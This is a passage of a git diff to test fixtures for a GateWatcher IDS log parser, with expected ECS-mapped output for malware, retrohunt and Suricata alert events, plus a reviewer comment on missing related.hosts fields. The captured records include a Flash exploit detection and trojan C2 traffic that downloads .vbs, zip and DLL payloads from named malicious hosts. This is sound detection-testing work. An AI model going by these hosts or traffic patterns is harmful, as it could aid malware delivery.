6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 
(B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}", + "event": { + "category": [ + "malware" + ], + "module": "malware", + "severity": 1, + "type": [ + "info" + ] + }, + "@timestamp": "2023-03-22T10:53:13.408000Z", + "destination": { + "address": "2.2.2.2", + "ip": "2.2.2.2", + "port": 19609 + }, + "file": { + "hash": { + "md5": "67ca9a31f220bc7b68f203c07ad668b9", + "sha256": "350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4" + }, + "name": "/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust", + "size": 77068 + }, + "gatewatcher": { + "event_type": "malware", + "fileinfo": "{\"file_id\": 379, \"filename\": \"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\", \"gaps\": false, \"magic\": \"Macromedia Flash data (compressed), version 14\", \"md5\": \"67ca9a31f220bc7b68f203c07ad668b9\", \"sha256\": \"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\", \"sid\": [1100020], \"size\": 77068, \"state\": \"CLOSED\", \"stored\": true, \"tx_id\": 1}", + "filemagic": "Macromedia Flash data (compressed), version 14", + "flow_id": "1910314914537014", + "gcap": "gcap-xxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "malcore": { + "code": "1", + "detail_threat_found": "Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF" + }, + "reporting_token": "No GBOX", 
+ "state": "Infected",
+ "timestamp_analyzed": "2023-03-22T10:53:13.408Z",
+ "timestamp_detected": "2023-03-22T10:35:22.615Z",
+ "type": "malcore"
+ },
+ "http": {
+ "request": {
+ "method": "GET"
+ },
+ "response": {
+ "status_code": 200
+ }
+ },
+ "network": {
+ "protocol": "http",
+ "transport": "TCP"
+ },
+ "observer": {
+ "hostname": "gcap-xxxxxxxxx.domain.local",
+ "name": "gcap-xxxxxxxx.domain.local",
+ "type": "ids",
+ "version": "0.2"
+ },
+ "related": {
+ "hash": [
+ "350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4",
+ "67ca9a31f220bc7b68f203c07ad668b9"
+ ],
+ "hosts": [
+ "gcap-xxxxxxxxx.domain.local",
+ "tsevid-synonymi.justdanceatsea.com"
+ ],
+ "ip": [
+ "1.1.1.1",
+ "2.2.2.2"
+ ]
+ },
+ "source": {
+ "address": "1.1.1.1",
+ "ip": "1.1.1.1",
+ "port": 8080
+ },
+ "url": {
+ "domain": "tsevid-synonymi.justdanceatsea.com",
+ "path": "/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust",
+ "registered_domain": "justdanceatsea.com",
+ "subdomain": "tsevid-synonymi",
+ "top_level_domain": "com"
+ },
+ "user_agent": {
+ "device": {
+ "name": "Other"
+ },
+ "name": "IE",
+ "original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
+ "os": {
+ "name": "Windows",
+ "version": "7"
+ },
+ "version": "8.0"
+ }
 }
 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json
index 39f436f31..d42b439ac 100644
--- a/GateWatcher/aioniq/tests/retrohunt.json
+++ b/GateWatcher/aioniq/tests/retrohunt.json
@@ -9,6 +9,100 @@ "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a 
trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}" }, "expected": { - "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB 
executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}" + "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first 
tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a 
trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}", + "event": { + "category": [ + "network" + ], + "module": "retrohunt", + "severity": 1 + }, + "@timestamp": "2023-06-12T10:12:39.001000Z", + "destination": { + "address": "2.2.2.2", + "ip": "2.2.2.2", + "port": 80 + }, + "gatewatcher": { + "campaigns": [], + "case_id": "00100035-1206-2023-edb6-b38911f8ba0c", + "categories": [ + "malware" + ], + "description": "IOC matching first tests", + "event_type": "retrohunt", + "external_links": [ + "{\"source_name\": \"URLHaus Abuse.ch\", \"url\": \"https://urlhaus.abuse.ch/url/2269068/\"}" + ], + "families": [ + "Hajime" + ], + "flow_id": "841376349480333", + "gcap": "gcap-xxxxxxxxxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxxxxxxxxxxx.domain.local", + "ioc_creation_date": "2023-06-12T10:00:35+00:00", + "ioc_id": "00100035-1206-2023-cbf5-08330f0d5bc0", + "ioc_tags": [ + "backdoor.hajime.linux.129", + "e32/agent.cd", + "elf.mirai.43048.gc", + "hajime", + "linux.hajime.bc", + "linux/hajime.75930", + "linux/hajime.a trojan", + 
"linux/hajime.nsnlw",
+ "trojan.elfarm32.hajime.fbhtfi",
+ "trojan.generickd.34055387",
+ "trojan.generickd.34055387 (b)",
+ "trojan.linux.hajime",
+ "unix.malware.agent-6626471-0"
+ ],
+ "ioc_type": "Host",
+ "ioc_updated_date": "2023-06-12T10:00:35+00:00",
+ "ioc_value": "im.a.very.bad.doma.in",
+ "kill_chain_phases": [],
+ "matched_event": "bd7686c8-20db-427e-941d-844a5ecfe559",
+ "matched_event_type": "alert",
+ "meta_data": "{\"cwe\": [], \"descriptions\": [], \"filetype\": \"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\", \"size\": 78.3984375, \"ssdeep\": \"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\", \"tslh\": \"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\", \"usageMode\": \"hunting\"}",
+ "probability": 0.5,
+ "relations": [
+ "0e3cc27b-7999-48ce-8484-dc12b325a355"
+ ],
+ "risk": "Suspicious",
+ "signature": "RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0",
+ "targeted_countries": [],
+ "targeted_organizations": [],
+ "targeted_platforms": [
+ "linux"
+ ],
+ "targeted_sectors": [],
+ "threat_actor": [
+ "GW Lab Test"
+ ],
+ "timestamp_analyzed": "2023-06-12T10:12:39.001Z",
+ "timestamp_detected": "2023-06-09T14:08:46.845Z",
+ "timestamp_package": "2023-06-12T10:00:35.012874+0000",
+ "tlp": "green",
+ "ttp": [],
+ "type": "cti",
+ "usage_mode": "hunting",
+ "vulnerabilities": []
+ },
+ "observer": {
+ "name": "gcap-xxxxxxxxxxxxxxxx.domain.local",
+ "type": "ids",
+ "version": "0.2"
+ },
+ "related": {
+ "ip": [
+ "1.1.1.1",
+ "2.2.2.2"
+ ]
+ },
+ "source": {
+ "address": "1.1.1.1",
+ "ip": "1.1.1.1",
+ "port": 55614
+ }
 }
 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json
index 576a3a270..bbbc667e0 100644
--- a/GateWatcher/aioniq/tests/sigflow-alert.json
+++ b/GateWatcher/aioniq/tests/sigflow-alert.json
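Review bot: The expected output for retrohunt never surfaces the matched indicator `ioc_value` ("im.a.very.bad.doma.in") in a pivotable ECS field: `related` carries only `ip`, with no `related.hosts` entry, whereas the malware and sigflow-alert fixtures on this page do populate `related.hosts` from the observed hostname. Since the IOC hit is the whole content of a retrohunt event, an analyst searching `related.hosts` for that domain will not find this alert; the fixture pins that gap, so the parser (and then this expectation) should add `"hosts": ["im.a.very.bad.doma.in"]` under `related`. Separately, `gatewatcher.external_links` is an array of JSON-encoded strings and `gatewatcher.meta_data` is a JSON string, i.e. double-encoded JSON that a consumer must re-parse to reach `url` or `ssdeep`; flattening them, or documenting that they are opaque strings, would avoid that. The new side also lacks the `event.type` the malware fixture carries next to `event.category`; presumably intentional, but worth confirming against the ECS category/type pairing.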
@@ -9,6 +9,81 @@ "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"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\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, 
*/*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was 
detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}" }, "expected": { - "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",
\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"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\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: 
www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}" + "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\"